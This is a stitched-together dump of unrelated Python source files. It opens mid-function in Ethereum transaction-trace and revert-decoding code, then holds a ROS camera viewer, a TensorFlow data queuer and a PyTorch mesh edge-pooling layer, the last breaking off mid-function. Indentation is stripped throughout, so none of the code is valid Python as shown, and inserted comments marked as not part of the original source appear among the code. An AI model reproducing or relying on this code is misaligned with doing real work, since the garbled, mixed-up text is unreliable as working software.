idx = trace.index(step) - 4
if trace[idx]["pc"] != step["pc"] - 4:
step = trace[idx]
# if this is the optimizer revert, find the actual source
if "optimizer_revert" in pc_map[step["pc"]]:
idx = trace.index(step) - 1
# look for the most recent jump
while trace[idx + 1]["op"] != "JUMPDEST":
if trace[idx]["source"] != step["source"]:
# if we find another line with a differing source offset prior
# to a JUMPDEST, the optimizer revert is also the actual revert
idx = trace.index(step)
break
idx -= 1
while not trace[idx]["source"]:
# now we're in a yul optimization, keep stepping back
# until we find a source offset
idx -= 1
# at last we have the real location of the revert
step["source"] = trace[idx]["source"]
step = trace[idx]
if "dev" in pc_map[step["pc"]]:
self._dev_revert_msg = pc_map[step["pc"]]["dev"]
else:
# extract the dev revert string from the source code
# TODO this technique appears superior to `_get_dev_revert`, and
# changes in solc 0.8.0 have necessitated it. the old approach
# of building a dev revert map should be refactored out in favor
# of this one.
source = contract._sources.get(step["source"]["filename"])
offset = step["source"]["offset"][1]
line = source[offset:].split("\n")[0]
marker = "//" if contract._build["language"] == "Solidity" else "#"
revert_str = line[line.index(marker) + len(marker) :].strip()
if revert_str.startswith("dev:"):
self._dev_revert_msg = revert_str
if self._revert_msg is None:
self._revert_msg = self._dev_revert_msg or ""
return
except (KeyError, AttributeError, TypeError, ValueError):
pass
if self._revert_msg is not None:
if self._dev_revert_msg is None:
self._dev_revert_msg = ""
return
op = next((i["op"] for i in trace[::-1] if i["op"] in ("REVERT", "INVALID")), None)
self._revert_msg = "invalid opcode" if op == "INVALID" else ""
def _expand_trace(self) -> None:
"""Adds the following attributes to each step of the stack trace:
address: The address executing this contract.
contractName: The name of the contract.
fn: The name of the function.
jumpDepth: Number of jumps made since entering this contract. The
initial value is 0.
source: {
filename: path to the source file for this step
offset: Start and end offset associated source code
}
"""
if self._raw_trace is None:
self._get_trace()
if self._trace is not None:
# in case `_get_trace` also expanded the trace, do not repeat
return
self._trace = trace = self._raw_trace
self._new_contracts = []
self._internal_transfers = []
self._subcalls = []
if self.contract_address or not trace:
coverage._add_transaction(self.coverage_hash, {})
return
if trace[0]["depth"] == 1:
self._trace_origin = "geth"
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
for t in trace:
t["depth"] = t["depth"] - 1
else:
self._trace_origin = "ganache"
if trace[0]["gasCost"] >= 21000:
# in ganache <6.10.0, gas costs are shifted by one step - we can
# identify this when the first step has a gas cost >= 21000
self._call_cost = trace[0]["gasCost"]
for i in range(len(trace) - 1):
trace[i]["gasCost"] = trace[i + 1]["gasCost"]
trace[-1]["gasCost"] = 0
else:
self._call_cost = self.gas_used - trace[0]["gas"] + trace[-1]["gas"]
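        # Illustrative numbers for the call cost: with gas_used == 51000, 29000 gas
        # remaining at the first traced step and 1000 at the last, the cost is
        # 51000 - 29000 + 1000 = 23000, i.e. the gas spent outside the traced VM steps
        # (base transaction cost, calldata, etc.).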
# last_map gives a quick reference of previous values at each depth
last_map = {0: _get_last_map(self.receiver, self.input[:10])} # type: ignore
coverage_eval: Dict = {last_map[0]["name"]: {}}
precompile_contract = re.compile(r"0x0{38}(?:0[1-9]|1[0-8])")
call_opcodes = ("CALL", "STATICCALL", "DELEGATECALL")
for i in range(len(trace)):
# if depth has increased, tx has called into a different contract
is_depth_increase = trace[i]["depth"] > trace[i - 1]["depth"]
is_subcall = trace[i - 1]["op"] in call_opcodes
if is_depth_increase or is_subcall:
step = trace[i - 1]
if step["op"] in ("CREATE", "CREATE2"):
# creating a new contract
out = next(x for x in trace[i:] if x["depth"] == step["depth"])
address = out["stack"][-1][-40:]
sig = f"<{step['op']}>"
calldata = None
self._new_contracts.append(EthAddress(address))
if int(step["stack"][-1], 16):
self._add_internal_xfer(step["address"], address, step["stack"][-1])
else:
# calling an existing contract
stack_idx = -4 if step["op"] in ("CALL", "CALLCODE") else -3
offset = int(step["stack"][stack_idx], 16)
length = int(step["stack"][stack_idx - 1], 16)
calldata = HexBytes("".join(step["memory"]))[offset : offset + length]
sig = calldata[:4].hex()
address = step["stack"][-2][-40:]
if is_depth_increase:
last_map[trace[i]["depth"]] = _get_last_map(address, sig)
coverage_eval.setdefault(last_map[trace[i]["depth"]]["name"], {})
self._subcalls.append(
{"from": step["address"], "to": EthAddress(address), "op": step["op"]}
)
if step["op"] in ("CALL", "CALLCODE"):
self._subcalls[-1]["value"] = int(step["stack"][-3], 16)
if is_depth_increase and calldata and last_map[trace[i]["depth"]].get("function"):
fn = last_map[trace[i]["depth"]]["function"]
self._subcalls[-1]["function"] = fn._input_sig
try:
zip_ = zip(fn.abi["inputs"], fn.decode_input(calldata))
inputs = {i[0]["name"]: i[1] for i in zip_} # type: ignore
self._subcalls[-1]["inputs"] = inputs
except Exception:
self._subcalls[-1]["calldata"] = calldata.hex()
elif calldata or is_subcall:
self._subcalls[-1]["calldata"] = calldata.hex() # type: ignore
if precompile_contract.search(str(self._subcalls[-1]["from"])) is not None:
caller = self._subcalls.pop(-2)["from"]
self._subcalls[-1]["from"] = caller
# update trace from last_map
last = last_map[trace[i]["depth"]]
trace[i].update(
address=last["address"],
contractName=last["name"],
fn=last["internal_calls"][-1],
jumpDepth=last["jumpDepth"],
source=False,
)
opcode = trace[i]["op"]
if opcode == "CALL" and int(trace[i]["stack"][-3], 16):
self._add_internal_xfer(
last["address"], trace[i]["stack"][-2][-40:], trace[i]["stack"][-3]
)
try:
pc = last["pc_map"][trace[i]["pc"]]
except (KeyError, TypeError):
# we don't have enough information about this contract
continue
if trace[i]["depth"] and opcode in ("RETURN", "REVERT", "INVALID", "SELFDESTRUCT"):
subcall: dict = next(
i for i in self._subcalls[::-1] if i["to"] == last["address"] # type: ignore
)
if opcode == "RETURN":
returndata = _get_memory(trace[i], -1)
if returndata:
fn = last["function"]
try:
return_values = fn.decode_output(returndata)
if len(fn.abi["outputs"]) == 1:
return_values = (return_values,)
subcall["return_value"] = return_values
except Exception:
subcall["returndata"] = returndata.hex()
else:
subcall["return_value"] = None
elif opcode == "SELFDESTRUCT":
subcall["selfdestruct"] = True
else:
if opcode == "REVERT":
data = _get_memory(trace[i], -1)
if len(data) > 4:
try:
subcall["revert_msg"] = decode_abi(["string"], data[4:])[0]
except Exception:
subcall["revert_msg"] = data.hex()
if "revert_msg" not in subcall and "dev" in pc:
subcall["revert_msg"] = pc["dev"]
if "path" not in pc:
continue
trace[i]["source"] = {"filename": last["path_map"][pc["path"]], "offset": pc["offset"]}
if "fn" not in pc:
continue
# calculate coverage
if last["coverage"]:
if pc["path"] not in coverage_eval[last["name"]]:
coverage_eval[last["name"]][pc["path"]] = [set(), set(), set()]
if "statement" in pc:
coverage_eval[last["name"]][pc["path"]][0].add(pc["statement"])
if "branch" in pc:
if pc["op"] != "JUMPI":
last["active_branches"].add(pc["branch"])
elif "active_branches" not in last or pc["branch"] in last["active_branches"]:
                        # key 1 records the false branch being taken, key 2 the true branch
key = 1 if trace[i + 1]["pc"] == trace[i]["pc"] + 1 else 2
coverage_eval[last["name"]][pc["path"]][key].add(pc["branch"])
if "active_branches" in last:
last["active_branches"].remove(pc["branch"])
# ignore jumps with no function - they are compiler optimizations
if "jump" in pc:
# jump 'i' is calling into an internal function
if pc["jump"] == "i":
try:
fn = last["pc_map"][trace[i + 1]["pc"]]["fn"]
except (KeyError, IndexError):
continue
if fn != last["internal_calls"][-1]:
last["internal_calls"].append(fn)
last["jumpDepth"] += 1
# jump 'o' is returning from an internal function
elif last["jumpDepth"] > 0:
del last["internal_calls"][-1]
last["jumpDepth"] -= 1
coverage._add_transaction(
self.coverage_hash, dict((k, v) for k, v in coverage_eval.items() if v)
)
def _add_internal_xfer(self, from_: str, to: str, value: str) -> None:
if not value.startswith("0x"):
value = f"0x{value}"
self._internal_transfers.append( # type: ignore
{"from": EthAddress(from_), "to": EthAddress(to), "value": Wei(value)}
)
def _full_name(self) -> str:
if self.contract_name and self.fn_name:
return f"{self.contract_name}.{self.fn_name}"
return self.fn_name or "Transaction"
def info(self) -> None:
"""Displays verbose information about the transaction, including decoded event logs."""
result = f"Tx Hash: {self.txid}\nFrom: {self.sender}\n"
if self.contract_address and self.status:
result += f"New {self.contract_name} address: {self.contract_address}\n"
else:
result += f"To: {self.receiver}\n" f"Value: {self.value}\n"
if self.input != "0x" and int(self.input, 16):
result += f"Function: {self._full_name()}\n"
result += (
f"Block: {self.block_number}\nGas Used: "
f"{self.gas_used} / {self.gas_limit} "
f"({self.gas_used / self.gas_limit:.1%})\n"
)
if self.events:
events = list(self.events)
call_tree: List = ["--------------------------"]
while events:
idx = next(
(events.index(i) for i in events if i.address != events[0].address), len(events)
)
contract = state._find_contract(events[0].address)
if contract:
try:
name = contract.name()
except Exception:
name = contract._name
sub_tree: List = [f"{name} ({events[0].address})"]
else:
sub_tree = [f"{events[0].address}"]
for event in events[:idx]:
sub_tree.append([event.name, *(f"{k}: {v}" for k, v in event.items())])
call_tree.append(sub_tree)
events = events[idx:]
event_tree = build_tree([call_tree], multiline_pad=0, pad_depth=[0, 1])
result = f"{result}\nEvents In This Transaction\n{event_tree}"
result = color.highlight(result)
status = ""
if not self.status:
status = f"({color('bright red')}{self.revert_msg or 'reverted'}{color})"
print(f"Transaction was Mined {status}\n---------------------\n{result}")
def _get_trace_gas(self, start: int, stop: int) -> Tuple[int, int]:
total_gas = 0
internal_gas = 0
is_internal = True
trace = self.trace
for i in range(start, stop):
# Check if we are in a subfunction or not
if is_internal and not _step_compare(trace[i], trace[start]):
is_internal = False
# For the internal gas tracking we ignore the gas passed to an external call
if trace[i]["depth"] > trace[start]["depth"]:
internal_gas -= trace[i - 1]["gasCost"]
elif not is_internal and _step_compare(trace[i], trace[start]):
is_internal = True
total_gas += trace[i]["gasCost"]
if is_internal:
internal_gas += trace[i]["gasCost"]
# manually add gas refunds where they occur
if trace[i]["op"] == "SSTORE" and int(trace[i]["stack"][-2], 16) == 0:
# 15000 gas is refunded if a word is set to 0x0
# Note: There is currently no way to check if the value was 0x0 before.
# This will give an incorrect refund if 0x0 is assigned to 0x0.
total_gas -= 15000
if is_internal:
internal_gas -= 15000
if trace[i]["op"] == "SELFDESTRUCT":
# 24000 gas is refunded on selfdestruct
total_gas -= 24000
if is_internal:
internal_gas -= 24000
# For external calls, add the remaining gas returned back
if start > 0 and trace[start]["depth"] > trace[start - 1]["depth"]:
total_gas += trace[start - 1]["gasCost"]
internal_gas += trace[start - 1]["gasCost"]
return internal_gas, total_gas
@trace_inspection
def call_trace(self, expand: bool = False) -> None:
"""
Display the complete sequence of contracts and methods called during
the transaction. The format:
Contract.functionName [instruction] start:stop [gas used]
* start:stop are index values for the `trace` member of this object,
showing the points where the call begins and ends
* for calls that include subcalls, gas use is displayed as
[gas used in this frame / gas used in this frame + subcalls]
* Calls displayed in red ended with a `REVERT` or `INVALID` instruction.
Arguments
---------
expand : bool
If `True`, show an expanded call trace including inputs and return values
"""
trace = self.trace
key = _step_internal(
trace[0], trace[-1], 0, len(trace), self._get_trace_gas(0, len(self.trace))
)
call_tree: List = [[key]]
active_tree: List = [call_tree[0]]
        # (index, depth, jumpDepth) for relevant steps in the trace
trace_index = [(0, 0, 0)] + [
(i, trace[i]["depth"], trace[i]["jumpDepth"])
for i in range(1, len(trace))
if not _step_compare(trace[i], trace[i - 1])
]
subcalls = self.subcalls[::-1]
for i, (idx, depth, jump_depth) in enumerate(trace_index[1:], start=1):
last = trace_index[i - 1]
if depth == last[1] and jump_depth < last[2]:
# returning from an internal function, reduce tree by one
active_tree.pop()
continue
elif depth < last[1]:
                # returning from an external call, reduce the tree by the previous depth's jumpDepth
active_tree = active_tree[: -(last[2] + 1)]
continue
if depth > last[1]:
# called to a new contract
end = next((x[0] for x in trace_index[i + 1 :] if x[1] < depth), len(trace))
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_external(
trace[idx],
trace[end - 1],
idx,
end,
(total_gas, internal_gas),
subcalls.pop(),
expand,
)
elif depth == last[1] and jump_depth > last[2]:
# jumped into an internal function
end = next(
(
x[0]
for x in trace_index[i + 1 :]
if x[1] < depth or (x[1] == depth and x[2] < jump_depth)
),
len(trace),
)
total_gas, internal_gas = self._get_trace_gas(idx, end)
key = _step_internal(
trace[idx], trace[end - 1], idx, end, (total_gas, internal_gas)
)
active_tree[-1].append([key])
active_tree.append(active_tree[-1][-1])
print(
f"Call trace for '{color('bright blue')}{self.txid}{color}':\n"
f"Initial call cost [{color('bright yellow')}{self._call_cost} gas{color}]"
)
print(build_tree(call_tree).rstrip())
def traceback(self) -> None:
print(self._traceback_string() or "")
@trace_inspection
def _traceback_string(self) -> str:
"""Returns an error traceback for the transaction."""
if self.status == 1:
return ""
trace = self.trace
try:
idx = next(i for i in range(len(trace)) if trace[i]["op"] in ("REVERT", "INVALID"))
trace_range = range(idx, -1, -1)
except StopIteration:
return ""
try:
result = [next(i for i in trace_range if trace[i]["source"])]
except StopIteration:
return ""
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
while True:
try:
idx = next(
i
for i in trace_range
if trace[i]["depth"] < depth
or (trace[i]["depth"] == depth and trace[i]["jumpDepth"] < jump_depth)
)
result.append(idx)
depth, jump_depth = trace[idx]["depth"], trace[idx]["jumpDepth"]
except StopIteration:
break
return f"{color}Traceback for '{color('bright blue')}{self.txid}{color}':\n" + "\n".join(
self._source_string(i, 0) for i in result[::-1]
)
def error(self, pad: int = 3) -> None:
print(self._error_string(pad) or "")
@trace_inspection
def _error_string(self, pad: int = 3) -> str:
"""Returns the source code that caused the transaction to revert.
Args:
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
if self.status == 1:
return ""
# if RPC returned a program counter, try to find source without querying trace
if self._revert_pc:
highlight, linenos, path, fn_name = build._get_error_source_from_pc(self._revert_pc)
if highlight:
return _format_source(highlight, linenos, path, self._revert_pc, -1, fn_name)
self._revert_pc = None
# iterate backward through the trace until a step has a source offset
trace = self.trace
trace_range = range(len(trace) - 1, -1, -1)
try:
idx = next(i for i in trace_range if trace[i]["op"] in {"REVERT", "INVALID"})
idx = next(i for i in trace_range if trace[i]["source"])
return self._source_string(idx, pad)
except StopIteration:
return ""
def source(self, idx: int, pad: int = 3) -> None:
print(self._source_string(idx, pad) or "")
@trace_inspection
def _source_string(self, idx: int, pad: int) -> str:
"""Displays the associated source code for a given stack trace step.
Args:
idx: Stack trace step index
pad: Number of unrelated lines of code to include before and after
Returns: source code string
"""
trace = self.trace[idx]
if not trace.get("source", None):
return ""
contract = state._find_contract(self.trace[idx]["address"])
source, linenos = highlight_source(
contract._sources.get(trace["source"]["filename"]), trace["source"]["offset"], pad
)
if not source:
return ""
return _format_source(
source,
linenos,
trace["source"]["filename"],
trace["pc"],
self.trace.index(trace),
trace["fn"],
)
def _format_source(source: str, linenos: Tuple, path: Path, pc: int, idx: int, fn_name: str) -> str:
ln = f" {color('bright blue')}{linenos[0]}"
if linenos[1] > linenos[0]:
ln = f"s{ln}{color('dark white')}-{color('bright blue')}{linenos[1]}"
return (
f"{color('dark white')}Trace step {color('bright blue')}{idx}{color('dark white')}, "
f"program counter {color('bright blue')}{pc}{color('dark white')}:\n {color('dark white')}"
f"File {color('bright magenta')}\"{path}\"{color('dark white')}, line{ln}"
f"{color('dark white')}, in {color('bright cyan')}{fn_name}{color('dark white')}:{source}"
)
def _step_compare(a: Dict, b: Dict) -> bool:
return a["depth"] == b["depth"] and a["jumpDepth"] == b["jumpDepth"]
def _step_internal(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict = None,
) -> str:
if last_step["op"] in {"REVERT", "INVALID"} and _step_compare(step, last_step):
contract_color = color("bright red")
else:
contract_color = color("bright cyan") if not step["jumpDepth"] else color()
key = f"{color('dark white')}{contract_color}{step['fn']} {color('dark white')}"
left_bracket = f"{color('dark white')}["
right_bracket = f"{color('dark white')}]"
if subcall:
key = f"{key}[{color}{subcall['op']}{right_bracket} "
key = f"{key}{start}:{stop}{color}"
if gas:
if gas[0] == gas[1]:
gas_str = f"{color('bright yellow')}{gas[0]} gas"
else:
gas_str = f"{color('bright yellow')}{gas[0]} / {gas[1]} gas"
key = f"{key} {left_bracket}{gas_str}{right_bracket}{color}"
if last_step["op"] == "SELFDESTRUCT":
key = f"{key} {left_bracket}{color('bright red')}SELFDESTRUCT{right_bracket}{color}"
return key
def _convert_0x_to_empty_bytes(value: Any) -> Any:
# black cannot parse `0x` without any trailing zeros, so we temporarily
# replace it with an empty bytestring
final = []
for item in value:
if isinstance(item, (list, tuple)):
final.append(_convert_0x_to_empty_bytes(item))
elif str(item) == "0x":
final.append(b"")
else:
final.append(item)
return type(value)(final)
def _format(value: Any) -> str:
if isinstance(value, (list, tuple)):
value = _convert_0x_to_empty_bytes(value)
mode = black.FileMode(line_length=60)
value = black.format_str(str(value), mode=mode).replace('b""', "0x")
return str(value)
def _step_external(
step: Dict,
last_step: Dict,
start: Union[str, int],
stop: Union[str, int],
gas: Tuple[int, int],
subcall: Dict,
expand: bool,
) -> str:
key = _step_internal(step, last_step, start, stop, gas, subcall)
if not expand:
return key
result: List = [key, f"address: {step['address']}"]
if "value" in subcall:
result.append(f"value: {subcall['value']}")
if "inputs" not in subcall:
result.append(f"calldata: {subcall.get('calldata')}")
elif subcall["inputs"]:
result.append(
["input arguments:", *(f"{k}: {_format(v)}" for k, v in subcall["inputs"].items())]
)
else:
result.append("input arguments: None")
if "return_value" in subcall:
value = subcall["return_value"]
if isinstance(value, tuple) and len(value) > 1:
result.append(["return values:", *(_format(i) for i in value)])
else:
if isinstance(value, tuple):
value = value[0]
result.append(f"return value: {_format(value)}")
elif "returndata" in subcall:
result.append(f"returndata: {subcall['returndata']}")
if "revert_msg" in subcall:
result.append(f"revert reason: {color('bright red')}{subcall['revert_msg']}{color}")
return build_tree([result], multiline_pad=0).rstrip()
def _get_memory(step: Dict, idx: int) -> HexBytes:
offset = int(step["stack"][idx], 16)
length = int(step["stack"][idx - 1], 16)
data = HexBytes("".join(step["memory"]))[offset : offset + length]
# append zero-bytes if allocated memory ends before `length` bytes
data = HexBytes(data + b"\x00" * (length - len(data)))
return data
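
# Hedged note (not part of the original source): on a CALL step the stack holds
# the args offset/length just below the gas, address and value entries, so a call
# like `_get_memory(step, -4)` would return the calldata forwarded to the subcall,
# zero-padded to the requested length. The index is illustrative only.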
def _get_last_map(address: EthAddress, sig: str) -> Dict:
contract = state._find_contract(address)
last_map = {"address": EthAddress(address), "jumpDepth": 0, "name": None, "coverage": False}
if contract:
if contract.get_method(sig):
full_fn_name = f"{contract._name}.{contract.get_method(sig)}"
else:
full_fn_name = contract._name
last_map.update(
contract=contract,
function=contract.get_method_object(sig),
name=contract._name,
internal_calls=[full_fn_name],
path_map=contract._build.get("allSourcePaths"),
pc_map=contract._build.get("pcMap"),
)
if isinstance(contract._project, project_main.Project):
# only evaluate coverage for contracts that are part of a `Project`
last_map["coverage"] = True
if contract._build.get("language") == "Solidity":
last_map["active_branches"] = set()
else:
last_map.update(contract=None, internal_calls=[f"<UnknownContract>.{sig}"], pc_map=None)
return last_map
def _is_call_to_precompile(subcall: dict) -> bool:
precompile_contract = re.compile(r"0x0{38}(?:0[1-9]|1[0-8])")
return True if precompile_contract.search(str(subcall["to"])) is not None else False
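

# Hedged example (not part of the original source): a minimal, self-contained
# check of the precompile-address regex above; the helper name is hypothetical.
def _example_precompile_check() -> None:
    assert _is_call_to_precompile({"to": "0x" + "0" * 38 + "01"})  # ecrecover precompile
    assert not _is_call_to_precompile({"to": "0x" + "0" * 38 + "ff"})  # ordinary address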
|
read_img.py
|
import rospy
import numpy as np
from sensor_msgs.msg import Image
import cv2
from threading import Thread
def callback(image):
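    # The raw sensor_msgs/Image payload is assumed here to be 8-bit BGRA
    # (4 bytes per pixel), so the flat byte buffer is reshaped to
    # (height, width, 4) before converting to BGR for display.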
byte_image = image.data
np_image = np.frombuffer(byte_image,dtype=np.uint8)
bgra_image = np_image.reshape((image.height,image.width,4))
bgr_image = cv2.cvtColor(bgra_image,cv2.COLOR_BGRA2BGR)
cv2.imshow("Camera Front",bgr_image)
cv2.waitKey(10)
if __name__ == "__main__":
rospy.init_node('camera', anonymous=True)
rospy.Subscriber("/lka/detected_image", Image, callback)
    Thread(target=rospy.spin).start()  # pass the function itself, not the result of calling it
|
DataQueuer.py
|
import tensorflow as tf
import numpy as np
import threading
from scipy import misc
from random import randint
import itertools
import pre_processor
class DataQueuer(object):
"""
Manages the concurrent fetching of data on the cpu onto the gpu
does not guarantee that images are appended in order
"""
def __init__(self,data_readers, pre_processors=[],n_threads=1,random_fetch = True):
self.n_threads = n_threads
self.random_fetch = random_fetch
self.data_readers = data_readers
with tf.variable_scope(None,default_name="queuer"):
# ensure all readers have the same number of data
self.n_data = data_readers[0].n_data
self.next_data = 0
for reader in data_readers:
assert self.n_data == reader.n_data, "readers do not read the same number of data"
assert len(data_readers) == len(pre_processors), "number of pre_processor sets not equal number of data readers"
# thread lock
self.lock = threading.Lock()
# get outputs from readers
data_outputs = []
data_shapes = []
data_types = []
for it,reader in enumerate(data_readers):
                # pass reader output through its pre-processors
processorList = pre_processors[it]
curDataSource = reader.data_out
curDataShape = reader.data_shape
curDataType = reader.data_type
for proc in processorList:
curDataSource = proc.attach_graph(curDataSource)
curDataShape = proc.get_data_shape(curDataShape)
curDataType = proc.get_data_type(curDataType)
data_outputs.append(curDataSource)
data_shapes.append(curDataShape)
data_types.append(curDataType)
#queue
self.queue = tf.FIFOQueue(shapes=data_shapes, dtypes=data_types, capacity=n_threads*8)
self.enqueue_op = self.queue.enqueue(data_outputs)
def close(self,sess):
close_op = self.queue.close(cancel_pending_enqueues=True)
sess.run(close_op)
for thread in self.threads:
thread.join()
def get_next_data_index(self):
with self.lock:
index = self.next_data
self.next_data += 1
if self.next_data >= self.n_data:
self.next_data = 0
return index
def get_next_data_index_random(self):
with self.lock:
index = randint(0,self.n_data-1)
return index
def thread_main(self, sess):
while True:
if self.random_fetch:
index = self.get_next_data_index_random()
else:
index = self.get_next_data_index()
#get feed dicts from readers
feed_dict = {}
for reader in self.data_readers:
feed_dict.update(reader.get_feed_dict(index))
try:
sess.run([self.enqueue_op],feed_dict=feed_dict)
except tf.errors.CancelledError:
exit()
def start_queueing(self,sess):
self.threads = []
for i in range(self.n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True
self.threads.append(thread)
thread.start()
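

# Hedged usage sketch (not part of the original module); `image_reader` and the
# batch size are assumptions about the surrounding project's reader interface:
#
#   queuer = DataQueuer([image_reader], pre_processors=[[]], n_threads=4)
#   batch_op = queuer.queue.dequeue_many(32)
#   with tf.Session() as sess:
#       queuer.start_queueing(sess)
#       images = sess.run(batch_op)
#       queuer.close(sess)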
|
mesh_pool.py
|
import torch
import torch.nn as nn
from threading import Thread
from models.layers.mesh_union import MeshUnion
import numpy as np
from heapq import heappop, heapify
from .mesh_rotation_utils import *
class MeshPool(nn.Module):
def __init__(self, target, multi_thread=False):
super(MeshPool, self).__init__()
self.__out_target = target
self.__multi_thread = multi_thread
self.__fe = None
self.__updated_fe = []
self.__meshes = None
self.__merge_edges = [-1, -1]
def __call__(self, fe, meshes):
return self.forward(fe, meshes)
def forward(self, fe, meshes):
self.__updated_fe = [[] for _ in range(len(meshes))]
pool_threads = []
self.__fe = fe
self.__meshes = meshes
# iterate over batch
for mesh_index in range(len(meshes)):
if self.__multi_thread:
pool_threads.append(
Thread(target=self.__pool_main, args=(mesh_index,)))
pool_threads[-1].start()
else:
self.__pool_main(mesh_index)
if self.__multi_thread:
for mesh_index in range(len(meshes)):
pool_threads[mesh_index].join()
a = self.__updated_fe
out_features = torch.cat(self.__updated_fe).view(len(meshes), -1,
self.__out_target)
return out_features
def __pool_main(self, mesh_index):
mesh = self.__meshes[mesh_index]
queue = self.__build_queue(self.__fe[mesh_index, :, :mesh.edges_count],
mesh.edges_count)
# print('pooling target - %d, mesh filename: %s' % (self.__out_target, mesh.filename))
last_count = mesh.edges_count + 1
mask = np.ones(mesh.edges_count, dtype=np.bool)
edge_groups = MeshUnion(mesh.edges_count, self.__fe.device)
while mesh.edges_count > self.__out_target:
value, edge_id = heappop(queue)
edge_id = int(edge_id)
# print('pool edge_id %d' % edge_id)
if mask[edge_id]:
status = self.__pool_edge(mesh, edge_id, mask, edge_groups)
mesh.clean(mask, edge_groups)
fe = edge_groups.rebuild_features(self.__fe[mesh_index], mask,
self.__out_target)
self.__updated_fe[mesh_index] = fe
# print('finish pooling')
def __pool_edge(self, mesh, edge_id, mask, edge_groups):
"""
This function implements edge pooling algorithm:
1. Clean mesh configuration from doublet edges and singlet edges.
2. For a non-boundary edge check if:
        2.1. First edge side is "clean".
        2.2. Second edge side is "clean".
        2.3. Edge one-ring neighborhood is valid.
3. Run edge collapse algorithm.
Args:
mesh (Mesh): mesh structure input (will be updated during the
process).
edge_id (int): edge identification number in the mesh.
mask: (ndarray): array of boolean values which indicates if an edge
                has already been removed.
edge_groups (MeshUnion): mesh union structure of edge groups in-
order to keep track of edge features
combinations.
Returns:
status (bool) - True if pool_edge algorithm succeeded,
False otherwise.
"""
# 1. Pool mesh operations
self.pool_mesh_operations(mesh, mask, edge_groups)
# Check if edge_id have boundaries
if self.has_boundaries(mesh, edge_id):
return False
# 2. Check edge configuration validity
if self.__clean_side(mesh, edge_id, 0) \
and self.__clean_side(mesh, edge_id, 3) \
and self.__is_one_ring_valid(mesh, edge_id):
# 3. Edge collapse algorithm
status = self.edge_collapse(edge_id, mesh, mask, edge_groups)
self.pool_mesh_operations(mesh, mask, edge_groups)
return status
else:
return False
def edge_collapse(self, edge_id, mesh, mask, edge_groups):
"""
This function implements edge collapse algorithm inspired by the paper:
"Practical quad mesh simplification" Tarini et al.
The algorithm goes as follows:
1. Extract edge mesh information (for each vertex extract edge
connections and their vertices).
2. Check if the edges connected to u and v have boundaries.
3. Rotate the edges connected to u and re-build their neighborhood.
4. Perform diagonal collapse from v to u - collapse the two edges from
the original edge_id neighborhood which are connected to v and
reconnect all the other edges connected to v with u. Re-build all
edges neighborhood.
5. Union edges groups according to new feature edges combinations.
"""
# 1. Get edge info
u, v_e_u, e_u, v, v_e_v, e_v = get_edge_hood_info(mesh, edge_id)
# 2. Check if u and v edges are with boundaries
correct_config, u, v_e_u, e_u, v, v_e_v, e_v = \
check_u_v_boundaries(mesh, u, v_e_u, e_u, v, v_e_v, e_v)
if not correct_config:
return False
# 3. Edges rotations around vertex u
mesh, new_features_combination_dict, diag_vertices = \
edge_rotations(u, e_u, v_e_u, mesh)
if diag_vertices is None:
return False
        # 4. collapse another 2 edges connected to the other vertex v and
# reconnect other edges from v connection to u connection
e_v = mesh.ve[v].copy() # edges connected to vertex v
self.collapse_other_vertex_v(mesh, u, v, e_v, diag_vertices,
new_features_combination_dict,
edge_groups, mask)
        # 5. union edge groups
MeshPool.__union_groups_at_once(mesh, edge_groups,
new_features_combination_dict)
return True
def collapse_other_vertex_v(self, mesh, u, v, e_v, diag_vertices,
new_features_combination_dict, edge_groups,
mask):
"""
This function implements the diagonal collapse from vertex v to vertex
u according to the following steps:
1. Check if vertex v is a doublet edges configuration.
If it is - clear the doublet and return (no other collapse is
needed).
2. Collapse (and finally remove) the 2 edges connected to v in the
original neighborhood of edge_id.
3. Re-connect all the other edges connected to v with u
4. Re-build all relevant edges neighborhoods.
"""
if self.pool_doublets(mesh, mask, edge_groups, [v]):
return
old_mesh = deepcopy(mesh)
e_to_collapse = [] # edges we should remove
        collapsed_e_to_orig_e_dict = dict()  # maps each collapsed edge to the edge it was merged into
e_to_reconnect_with_u = [] # edges we should re-connect with vertex u
for e in e_v:
u_e, v_e = mesh.edges[e, :]
if u_e == v: # make sure u_e is the other vertex
u_e = v_e
v_e = v
            # if it is an edge of the closest hood (connected to a diagonal vertex)
if u_e in diag_vertices or v_e in diag_vertices:
e_to_collapse.append(e)
for key in new_features_combination_dict.keys():
if u_e in mesh.edges[key]:
edge_to_add_feature = key
new_features_combination_dict[key].append(e)
collapsed_e_to_orig_e_dict[e] = key
break
# collapse
self.remove_edge(mesh, e, edge_groups, mask)
else:
e_to_reconnect_with_u.append(e)
mesh.ve[v].remove(e)
mesh.ve[u].append(e)
if mesh.edges[e, 0] == v:
mesh.edges[e, 0] = u
else:
mesh.edges[e, 1] = u
# fix hood for edges which re-connected to u
already_built_edges_hood = []
for e in e_to_reconnect_with_u:
hood = old_mesh.gemm_edges[e]
edges_to_check = [e] + list(hood)
for edge in edges_to_check:
if edge in already_built_edges_hood or edge in e_to_collapse:
continue
already_built_edges_hood.append(edge)
old_hood = old_mesh.gemm_edges[edge]
new_hood = mesh.gemm_edges[edge]
# replace any e_to_collapse edge by the matched edge
for e_collapse in e_to_collapse:
if np.any([h == e_collapse for h in old_hood]):
e_collapse_pos = \
np.where([h == e_collapse for h in old_hood])[0][0]
new_hood[e_collapse_pos] = collapsed_e_to_orig_e_dict[
e_collapse]
# now fix hood for the rotated edges
for key in collapsed_e_to_orig_e_dict:
edge = collapsed_e_to_orig_e_dict[key]
old_hood = old_mesh.gemm_edges[edge]
new_hood = mesh.gemm_edges[edge]
already_built_edges_hood.append(edge)
if key in old_hood[0:3]:
if edge not in old_mesh.gemm_edges[key, 0:3]:
new_hood[0:3] = old_mesh.gemm_edges[key, 0:3]
else:
new_hood[0:3] = old_mesh.gemm_edges[key, 3:6]
elif key in old_hood[3:6]:
if edge not in old_mesh.gemm_edges[key, 0:3]:
new_hood[3:6] = old_mesh.gemm_edges[key, 0:3]
else:
new_hood[3:6] = old_mesh.gemm_edges[key, 3:6]
else:
assert (False)
for i, e in enumerate(new_hood):
if e in collapsed_e_to_orig_e_dict.keys():
new_hood[i] = collapsed_e_to_orig_e_dict[e]
# fix hood order:
